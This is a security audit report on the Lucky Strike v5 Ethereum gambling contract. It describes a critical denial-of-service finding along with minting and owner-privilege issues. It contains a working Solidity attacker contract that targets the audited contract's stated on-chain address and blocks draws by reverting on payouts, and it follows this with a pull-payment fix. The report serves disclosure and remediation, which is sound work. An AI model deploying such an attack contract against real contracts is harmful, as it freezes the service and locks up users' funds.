This is the report from a security audit performed on Lucky Strike v5 by gorbunovperm.
Lucky Strike, based fully on an Ethereum smart contract, is bringing the core philosophy of blockchain to the gambling industry, enhancing it with an ICO model we're calling 'Bet & Own.'
https://lucky-strike.io/game/#/
In total, 4 issues were reported, including:
- 1 critical severity issue.
- 0 high severity issues.
- 0 medium severity issues.
- 1 low severity issue.
- 1 owner privileges issue.
- 1 note.
In the current version the draw is processed as a queue and each bet is played out one by one. If a bet wins, the winner is paid the reward through the transfer function. The peculiarity of this function is that if the recipient throws, the entire transaction is rolled back. A throw can be triggered intentionally by an attacker if the recipient is another smart contract. Thus the attacker can block the entire contract, making it impossible to place bets or run draws.
Simple example of an attacker's contract (placeABet is the bet entry point of the audited contract; the minimal interface below is added so the example compiles):
pragma solidity ^0.4.24;

// Minimal interface for the audited contract's bet entry point.
interface LuckyStrike {
    function placeABet() external payable;
}

contract Attacker {
    // Address of the audited Lucky Strike contract as given in this report.
    LuckyStrike public ls = LuckyStrike(address(0x1A77110391C07D3d67c8c55C6114A858cB45BB26));
    bool public blockMode = true;

    function turnBlockModeOn() public {
        blockMode = true;
    }

    function turnBlockModeOff() public {
        blockMode = false;
    }

    // Fallback: while blockMode is on, every transfer() from LuckyStrike to this
    // contract reverts, which rolls back the whole draw transaction.
    function () external payable {
        if (blockMode) {
            revert(); // LuckyStrike blocked
        }
    }

    // Place a bet so that this contract ends up in the draw queue.
    function bet() public payable {
        ls.placeABet.value(msg.value)();
    }
}
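As an added illustration (not code from this audit or from Lucky Strike), here is the payout step of a queued draw rewritten with a pull-payment pattern, so that a recipient whose fallback reverts cannot roll back the draw for everyone else. The contract name and the pendingPayouts, payWinner, payWinnerTrySend and withdrawPayout identifiers are assumptions.

```solidity
pragma solidity ^0.4.24;

// Added example, not Lucky Strike's code. Shows the payout step of a queued
// draw rewritten so that a recipient whose fallback reverts (as in the
// Attacker contract above) cannot roll back the draw for everyone.
// PullPayoutGame, pendingPayouts, payWinner and withdrawPayout are assumed names.
contract PullPayoutGame {
    mapping(address => uint256) public pendingPayouts;

    event PayoutCredited(address indexed winner, uint256 amount);
    event PayoutWithdrawn(address indexed winner, uint256 amount);

    // Vulnerable pattern described in the report (kept as a comment):
    // winner.transfer(amount) forwards 2300 gas and throws if the recipient
    // reverts, which undoes the whole draw transaction and stalls the queue.
    //
    // function payWinner(address winner, uint256 amount) internal {
    //     winner.transfer(amount);
    // }

    // Hardened pattern (pull payment): record the win and make no external call
    // from the draw itself, so no recipient can block the draw.
    function payWinner(address winner, uint256 amount) internal {
        pendingPayouts[winner] += amount;
        emit PayoutCredited(winner, amount);
    }

    // Alternative: attempt a send() (which returns false instead of throwing)
    // and fall back to crediting the balance when the recipient rejects the ether.
    function payWinnerTrySend(address winner, uint256 amount) internal {
        if (!winner.send(amount)) {
            pendingPayouts[winner] += amount;
            emit PayoutCredited(winner, amount);
        }
    }

    // Each winner withdraws its own funds; a revert here affects only the caller.
    function withdrawPayout() external {
        uint256 amount = pendingPayouts[msg.sender];
        require(amount > 0, "nothing to withdraw");
        pendingPayouts[msg.sender] = 0; // zero before the call (checks-effects-interactions)
        msg.sender.transfer(amount);
        emit PayoutWithdrawn(msg.sender, amount);
    }
}
```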
- A double withdrawal attack is possible. More details here
- Lack of a transaction handling mechanism. WARNING! This is a very common issue and it has already caused losses of millions of dollars for many token users! More details here
The mint function allows the owner to mint more tokens than hardCap. You should check (invested + _invested) > hardCap before minting and, if it is true, mint only hardCap - invested tokens and return the remainder to the investor.
The adjustAllocation function allows the owner to reset the rates of the different jackpots and the income rate.
There is one serious vulnerability that should be fixed.